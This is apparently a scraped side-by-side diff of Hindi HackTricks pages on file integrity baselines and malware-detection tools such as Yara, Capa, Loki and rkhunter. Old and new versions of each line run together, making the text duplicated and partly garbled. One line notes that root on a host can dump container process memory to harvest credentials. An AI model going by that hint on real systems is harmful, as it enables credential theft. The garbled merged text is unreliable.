ध्यान दें कि जब आप एक होस्ट के अंदर एक डॉकर कंटेनर चलाते हैं **तो आप होस्ट से कंटेनर पर चल रहे प्रोसेस देख सकते हैं** बस `ps -ef` चलाकर ध्यान दें कि जब आप एक होस्ट के अंदर एक डॉकर कंटेनर चलाते हैं **तो आप होस्ट से कंटेनर पर चल रहे प्रोसेस देख सकते हैं** बस `ps -ef` चलाकर
इसलिए (रूट के रूप में) आप **होस्ट से प्रोसेस की मेमोरी डंप** कर सकते हैं और **क्रेडेंशियल्स** खोज कर सकते हैं बस [**निम्नलिखित उदाहरण की तरह**](../../linux-hardening/privilege-escalation/#process-memory)। इसलिए (रूट के रूप में) आप **होस्ट से प्रोसेसेस की मेमोरी डंप** कर सकते हैं और **क्रेडेंशियल्स**े लिए खोज कर सकते हैं बस [**निम्नलिखित उदाहरण की तरह**](../../linux-hardening/privilege-escalation/#process-memory)।

View file

@ -1,40 +1,54 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>
{% endhint %}
# मूल्यांकन # मूलाधार
एक मूल्यांकन में एक सिस्टम के कुछ हिस्सों का एक स्नैपशॉट लेना शामिल है ताकि **बदलावों को हाइलाइट करने के लिए एक भविष्य की स्थिति के साथ तुलना की जा सके**। एक मूलाधार किसी सिस्टम के कुछ हिस्सों का एक स्नैपशॉट लेने से बनता है **इसे भविष्य की स्थिति के साथ तुलना करने के लिए परिवर्तनों को हाइलाइट करने के लिए**।
उदाहरण के लिए, आप फाइल सिस्टम की प्रत्येक फ़ाइल का हैश कैलकुलेट और स्टोर कर सकते हैं ताकि आप पता लगा सकें कि कौन सी फ़ाइलें संशोधित की गई थीं।\ उदाहरण के लिए, आप फाइल सिस्टम की प्रत्येक फ़ाइल का हैश गणना और स्टोर करना कर सकते हैं ताकि आप पता लगा सकें कि कौन सी फ़ाइलें संशोधित की गई थीं।\
इसे उपयोगकर्ता खाते बनाए गए, प्रक्रियाएँ चल रही हैं, सेवाएँ चल रही हैं और किसी भी अन्य चीज़ के साथ भी किया जा सकता है जो बहुत अधिक या पूरी तरह से बदलना नहीं चाहिए। यह भी उपयोगकर्ता खाते बनाए गए, प्रक्रियाएँ चल रही हैं, सेवाएँ चल रही हैं और किसी भी अन्य चीज़ के साथ किया जा सकता है जो बहुत अधिक या पूरी तरह से बदलना नहीं चाहिए।
## फ़ाइल अखंडता मॉनिटरिंग ## फ़ाइल अखंडता मॉनिटरिंग
फ़ाइल अखंडता मॉनिटरिंग (FIM) एक महत्वपूर्ण सुरक्षा तकनीक है जो फ़ाइलों में परिवर्तनों का ट्रैक करके IT वातावरण और डेटा की सुरक्षा करती है। इसमें दो मुख्य कदम शामिल हैं: फ़ाइल अखंडता मॉनिटरिंग (FIM) एक महत्वपूर्ण सुरक्षा तकनीक है जो फ़ाइलों में परिवर्तनों का ट्रैकिंग करके IT वातावरण और डेटा को सुरक्षित रखती है। इसमें दो मुख्य कदम शामिल हैं:
1. **मूल्यांकन तुलना:** भविष्य की तुलना के लिए फ़ाइल गुणांक या एन्क्रिप्टेड चेकसम्स (जैसे MD5 या SHA-2) का उपयोग करके एक मूल्यांकन स्थापित करें ताकि संशोधनों का पता लगा सकें 1. **मूलाधार तुलना:** भविष्य के तुलना के लिए फ़ाइल गुणांक या क्रिप्टोग्राफिक चेकसम्स (जैसे MD5 या SHA-2) का उपयोग करके एक मूलाधार स्थापित करें ताकि संशोधनों का पता लगाने के लिए
2. **रियल-टाइम चेंज नोटिफिकेशन:** फ़ाइलों तक पहुंचने या संशोधित किए जाने पर तुरंत अलर्ट प्राप्त करें, आम तौर पर OS कर्नल एक्सटेंशन के माध्यम से। 2. **रियल-टाइम चेंज नोटिफिकेशन:** फ़ाइलों तक पहुंचने या संशोध किए जाने पर तुरंत अलर्ट प्राप्त करें, आम तौर पर OS कर्नल एक्सटेंशन के माध्यम से।
## उपकरण ## उपकरण
* [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring) * [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring)
* [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software) * [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software)
# संदर्भ ## संदर्भ
* [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it) * [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it)
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary>हैकट्रिक्स का समर्थन करें</summary>
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
</details>
{% endhint %}

View file

@ -1,18 +1,19 @@
# मैलवेयर विश्लेषण # मैलवेयर विश्लेषण
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
## फोरेंसिक्स चीटशीट्स ## फोरेंसिक्स चीटशीट्स
@ -28,7 +29,7 @@ HackTricks का समर्थन करने के अन्य तरी
## ऑफलाइन एंटीवायरस और पहचान उपकरण ## ऑफलाइन एंटीवायरस और पहचान उपकरण
### Yara ### यारा
#### स्थापित #### स्थापित
```bash ```bash
@ -37,7 +38,7 @@ sudo apt-get install -y yara
#### नियम तैयार करें #### नियम तैयार करें
इस स्क्रिप्ट का उपयोग करके गिथब से सभी यारा मैलवेयर नियम डाउनलोड और मर्ज करें: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ इस स्क्रिप्ट का उपयोग करके गिथब से सभी यारा मैलवेयर नियम डाउनलोड और मर्ज करें: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
_**rules**_ निर्देशिका बनाएं और इसे निष्पादित करें। इससे _**malware\_rules.yar**_ नाम क फ़ाइल बनेगी जिसमें सभी मैलवेयर के लिए यारा नियम होंगे। _**rules**_ निर्देशिका बनाएं और इसे निष्पादित करें। इससे _**malware\_rules.yar**_ नाम क फ़ाइल बनेगी जिसमें सभी मैलवेयर के लिए यारा नियम होंगे।
```bash ```bash
wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
mkdir rules mkdir rules
@ -48,9 +49,9 @@ python malware_yara_rules.py
yara -w malware_rules.yar image #Scan 1 file yara -w malware_rules.yar image #Scan 1 file
yara -w malware_rules.yar folder #Scan the whole folder yara -w malware_rules.yar folder #Scan the whole folder
``` ```
#### YaraGen: मैलवेयर की जाच करें और नियम बनाएं #### YaraGen: मैलवेयर की जाच करें और नियम बनाएं
आप टूल [**YaraGen**](https://github.com/Neo23x0/yarGen) का उपयोग करके एक बाइनरी से यारा नियम उत्पन्न कर सक हैं। इन ट्यूटोरियल्स की जाँच करें: [**भाग 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**भाग 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**भाग 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/) आप टूल [**YaraGen**](https://github.com/Neo23x0/yarGen) का उपयोग कर हैं ताकि आप एक बाइनरी से यारा नियम उत्पन्न कर सकें। इन ट्यूटोरियल्स की जाँच करें: [**भाग 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**भाग 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**भाग 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
```bash ```bash
python3 yarGen.py --update python3 yarGen.py --update
python3.exe yarGen.py --excludegood -m ../../mals/ python3.exe yarGen.py --excludegood -m ../../mals/
@ -67,11 +68,11 @@ sudo freshclam #Update rules
clamscan filepath #Scan 1 file clamscan filepath #Scan 1 file
clamscan folderpath #Scan the whole folder clamscan folderpath #Scan the whole folder
``` ```
### [कैपा](https://github.com/mandiant/capa) ### [Capa](https://github.com/mandiant/capa)
**कैपा** executables में पोटेंशियली हानिकारक **क्षमताएँ** का पता लगाता है: PE, ELF, .NET। इसलिए यह चीजों को खोजेगा जैसे Att\&ck तकनीकें, या संदिग्ध क्षमताएँ जैसे: **Capa** प्रोग्रामों में संभावित दुष्ट **क्षमताएँ** का पता लगाता है: PE, ELF, .NET। इसलिए यह चीजों को खोजेगा जैसे Att\&ck युक्तियाँ, या संदिग्ध क्षमताएँ जैसे:
* OutputDebugString त्रुटि की जाच करें * OutputDebugString त्रुटि की जाच करें
* सेवा के रूप में चलाएं * सेवा के रूप में चलाएं
* प्रक्रिया बनाएं * प्रक्रिया बनाएं
@ -79,15 +80,15 @@ clamscan folderpath #Scan the whole folder
### IOCs ### IOCs
IOC का मतलब होता है Indicator Of Compromise। एक IOC एक सेट की **शर्तें हैं जो** कुछ पोटेंशियली अवांछित सॉफ्टवेयर या पुष्ट **मैलवेयर** की पहचान करती हैं। ब्लू टीम इस प्रकार की परिभाषा का उपयोग अपने **सिस्टम** और **नेटवर्क** में इस प्रकार के हानिकारक फ़ाइलों की **खोज के लिए** करती है।\ IOC का मतलब होता है Indicator Of Compromise। एक IOC एक सेट की **शर्तें हैं जो** कुछ संभावित अवांछित सॉफ्टवेयर या पुष्ट **मैलवेयर** की पहचान करती हैं। ब्लू टीम इस प्रकार की परिभाषा का उपयोग अपने **सिस्टम** और **नेटवर्क्स** में **इस प्रकार के दुष्ट फ़ाइलें खोजने** के लिए करती है।\
इन परिभाषाओं को साझा करना बहुत उपयोगी है क्योंकि जब किसी कंप्यूटर में मैलवेयर की पहचान होती है और उस मैलवेयर के लिए एक IOC बनाया जाता है, तो अन्य ब्लू टीम इसका उपयोग करके मैलवेयर की पहचान तेजी से कर सकती है। इन परिभाषाओं को साझा करना बहुत उपयोगी है क्योंकि जब किसी कंप्यूटर में मैलवेयर की पहचान होती है और उस मैलवेयर के लिए एक IOC बनाया जाता है, तो अन्य ब्लू टीम इसका उपयोग करके मैलवेयर की पहचान तेज कर सकती है।
IOC बनाने या संशोधित करने के लिए एक उपकरण है [**IOC संपादक**](https://www.fireeye.com/services/freeware/ioc-editor.html)**।**\ IOC बनाने या संशोधित करने के लिए एक उपकरण है [**IOC संपादक**](https://www.fireeye.com/services/freeware/ioc-editor.html)**।**\
आप उपकरणों का उपयोग कर सकते हैं जैसे [**Redline**](https://www.fireeye.com/services/freeware/redline.html) **डिवाइस में परिभाषित IOC की खोज करने के लिए**। आप [**Redline**](https://www.fireeye.com/services/freeware/redline.html) जैसे उपकरण का उपयोग कर सकते हैं **एक उपकरण में परिभाषित IOC खोजने के लिए**।
### लोकी ### Loki
[**लोकी**](https://github.com/Neo23x0/Loki) एक स्कैनर है आसान इंडिकेटर्स ऑफ कंप्रोमाइज के लिए।\ [**Loki**](https://github.com/Neo23x0/Loki) एक स्कैनर है आसान दुष्टता के संकेतों के लिए।\
पहचान चार पहचान पद्धतियों पर आधारित है: पहचान चार पहचान पद्धतियों पर आधारित है:
``` ```
1. File Name IOC 1. File Name IOC
@ -104,11 +105,11 @@ Compares process connection endpoints with C2 IOCs (new since version v.10)
``` ```
### लिनक्स मैलवेयर डिटेक्ट ### लिनक्स मैलवेयर डिटेक्ट
[**लिनक्स मैलवेयर डिटेक्ट (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) एक मैलवेयर स्कैनर है जो गनू जीवीपीएल लाइसेंस के तहत जारी किया गया है, जो साझा होस्टेड वातावरणों में प्रतिकूलताओं के आसपास डिज़ाइन किया गया है। यह नेटवर्क किनारे घुसपैठ डिटेक्शन सिस्टम से धमाकों में उपयोग किया जा रहा मैलवेयर निकालने के लिए धमाकों से निकाला गया मैलवेयर का डेटा उपयोग करता है और पहचान के लिए सिग्नेचर उत्पन्न करता है। साथ ही, धमाकों से डेटा भी LMD चेकआउट सुविधा और मैलवेयर समुदाय संसाधनों से प्राप्त किया जाता है। [**लिनक्स मैलवेयर डिटेक्ट (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) एक मैलवेयर स्कैनर है जो गीनू GPLv2 लाइसेंस के तहत जारी किया गया है, जो साझा होस्टेड वातावरणों में प्रतिकूल सामना करने के लिए डिज़ाइन किया गया है। यह नेटवर्क एज इन्ट्रूजन डिटेक्शन सिस्टम से धमाकों में उपयोग किया जा रहा मैलवेयर को निकालने के लिए धमाकों के खतरों के आसपास डिज़ाइन किया गया है और पहचान के लिए सिग्नेचर उत्पन्न करता है। साथ ही, धमाकों के डेटा को भी LMD चेकआउट सुविधा और मैलवेयर समुदाय संसाधनों से प्राप्त किया जाता है।
### आरकेहंटर ### rkhunter
[**रेखंटर**](http://rkhunter.sourceforge.net) जैसे उपकरण फाइल सिस्टम की जाँच के लिए उपयोग किया जा सकता है जहाँ संभावित **रूटकिट्स** और मैलवेयर की जाँच की जा सकती है। [**rkhunter**](http://rkhunter.sourceforge.net) जैसे उपकरण को फाइल सिस्टम की जाँच के लिए उपयोग किया जा सकता है जिसमें संभावित **रूटकिट्स** और मैलवेयर की जाँच की जा सकती है।
```bash ```bash
sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress] sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress]
``` ```
@ -118,27 +119,27 @@ sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--sk
### PEpper ### PEpper
[PEpper ](https://github.com/Th3Hurrican3/PEpper) executable में कुछ मौलिक विषयों की जांच करता है (बाइनरी डेटा, एंट्रोपी, URLs और IPs, कुछ yara नियम।) [PEpper ](https://github.com/Th3Hurrican3/PEpper) executable में कुछ मौलिक विषयों की जांच करता है (binary data, entropy, URLs और IPs, कुछ yara rules).
### PEstudio ### PEstudio
[PEstudio](https://www.winitor.com/download) एक टूल है जो Windows executables की जानकारी प्राप्त करने की अनुमति देता है जैसे imports, exports, headers, लेकिन यह वायरस टोटल की जांच करेगा और पोटेंशियल Att\&ck तकनीकों को भी खोजेगा। [PEstudio](https://www.winitor.com/download) एक टूल है जो Windows executables की जानकारी प्राप्त करने की अनुमति देता है जैसे imports, exports, headers, लेकिन यह वायरस टोटल की जांच करेगा और potential Att\&ck techniques खोजेगा।
### Detect It Easy(DiE) ### Detect It Easy(DiE)
[**DiE**](https://github.com/horsicq/Detect-It-Easy/) एक टूल है जो फ़ाइल क**एन्क्रिप्टेड** है या नहीं यह खोजने के लिए है और **पैकर्स** को भी खोजेगा। [**DiE**](https://github.com/horsicq/Detect-It-Easy/) एक टूल है जो फ़ाइल के एन्क्रिप्टेड होने की जांच करने के लिए है और **packers** भी खोजेगा।
### NeoPI ### NeoPI
[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI) एक Python स्क्रिप्ट है जो **सांख्यिकीय विधियों** का उपयोग करके **छिपे हुए** और **एन्क्रिप्टेड** सामग्री की खोज करने के लिए है। NeoPI का उद्देश्य **छिपी वेब शैल कोड** की **खोज** में सहायता करना है। [**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI) एक Python script है जो **statistical methods** का उपयोग करके text/script files में **obfuscated** और **encrypted** content की पहचान करने के लिए है। NeoPI का उद्देश्य **hidden web shell code** की पहचान में सहायता करना है।
### **php-malware-finder** ### **php-malware-finder**
[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) अपनी सर्वोत्तम प्रयास करता है कि **छिपे हुए**/**अविश्वसनीय कोड** को खोजें जैसे कि फ़ाइलें जो **मैलवेयर**/वेबशैल में अक्सर उपयोग की जाने वाली **PHP** फ़ंक्शन्स का उपयोग कर रही हों। [**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) अपनी सर्वोत्तम कोशिश करता है कि **obfuscated**/**dodgy code** और फ़ाइलों की पहचान करें जो अक्सर **malwares**/webshells में उपयोग की जाने वाली **PHP** functions का उपयोग करती हैं।
### Apple Binary Signatures ### Apple Binary Signatures
किसी **मैलवेयर नमूने** की जांच करते समय आपको हमेशा बाइनरी के **सिग्नेचर** की जांच करनी चाहिए क्योंकि उस **डेवलपर** को जिसने इसे साइन किया हो, पहलेे ही **मैलवेयर** से **संबंधित** हो सकता है। किसी **malware sample** की जांच करते समय आपको हमेशा बाइनरी के **signature** की जांच करनी चाहिए क्योंकि उस **developer** को जिसने इसे साइन किया हो संबंधित हो सकता है **malware** के साथ
```bash ```bash
#Get signer #Get signer
codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier" codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"
@ -149,16 +150,16 @@ codesign --verify --verbose /Applications/Safari.app
#Check if the signature is valid #Check if the signature is valid
spctl --assess --verbose /Applications/Safari.app spctl --assess --verbose /Applications/Safari.app
``` ```
## पहचान तकनीकें ## डिटेक्शन तकनीक
### फ़ाइल स्टैकिंग ### फ़ाइल स्टैकिंग
अगर आपको पता है कि किसी वेब सर्वर के **फ़ाइलें** की एक फ़ोल्डर **कोई निश्चित तारीख** को **अपडेट किया गया था**। **जांचें** कि **वेब सर्वर की सभी फ़ाइलें कब बनाई और संशोधित** की गई थीं और यदि कोई तारीख **संदिग्ध** है, तो उस फ़ाइल की जांच करें। अगर आपको पता है कि किसी वेब सर्वर के **फ़ाइलें** की एक फ़ोल्डर **कोई तारीख** पर **अंतिम बार अपडेट की गई थी**। **जांचें** कि **वेब सर्वर की सभी फ़ाइलें कब बनाई और संशोधित** की गई थीं और यदि कोई तारीख **संदिग्ध** है, तो उस फ़ाइल की जांच करें।
### बेसलाइन्स ### बेसलाइन्स
अगर किसी फ़ोल्डर की फ़ाइलें **संशोधित नहीं होनी चाहिए**, तो आप फ़ोल्डर की **मौलिक फ़ाइलों** का **हैश** निकाल सकते हैं और उन्हें **वर्तमान** वालों के साथ **तुलना** कर सकते हैं। कुछ भी संशोधित होने पर **संदिग्ध** होगा। अगर किसी फ़ोल्डर की फ़ाइलें **संशोधित नहीं होनी चाहिए**, तो आप फ़ोल्डर की **मौलिक फ़ाइलों** का **हैश** निकाल सकते हैं और उन्हें **वर्तमान** फ़ाइलों के साथ **तुलना** कर सकते हैं। कुछ भी संशोधित होने पर **संदिग्ध** होगा।
### सांख्यिकीय विश्लेषण ### सांख्यिकीय विश्लेषण
जब जानकारी लॉग में सहेजी जाती है तो आप **जांच सकते हैं कि वेब सर्वर की प्रत्येक फ़ाइल का कितनी बार एक्सेस किया गया था क्योंकि एक वेब शैल में एक** शामिल हो सकता है जब जानकारी लॉग में सहेजी जाती है तो आप **जांच सकते हैं कि वेब सर्वर की प्रत्येक फ़ाइल का कितनी बार एक्सेस किया गया था क्योंकि एक वेब शैल में एक वेब शैल सबसे अधिक हो सकता है**

View file

@ -1,19 +1,20 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>HackTricks का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी कंपनी को **HackTricks में विज्ञापित करना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
यहाँ आप विशेष फ़ाइल प्रकार और/या सॉफ़्टवेयर के लिए दिलचस्प ट्रिक्स पा सकते हैं: यहाँ आप विशेष फ़ाइल प्रकारों और/या सॉफ़्टवेयर के लिए दिलचस्प ट्रिक्स पा सकते हैं:
{% page-ref page=".pyc.md" %} {% page-ref page=".pyc.md" %}
@ -37,16 +38,17 @@ HackTricks का समर्थन करने के अन्य तरी
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>HackTricks का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
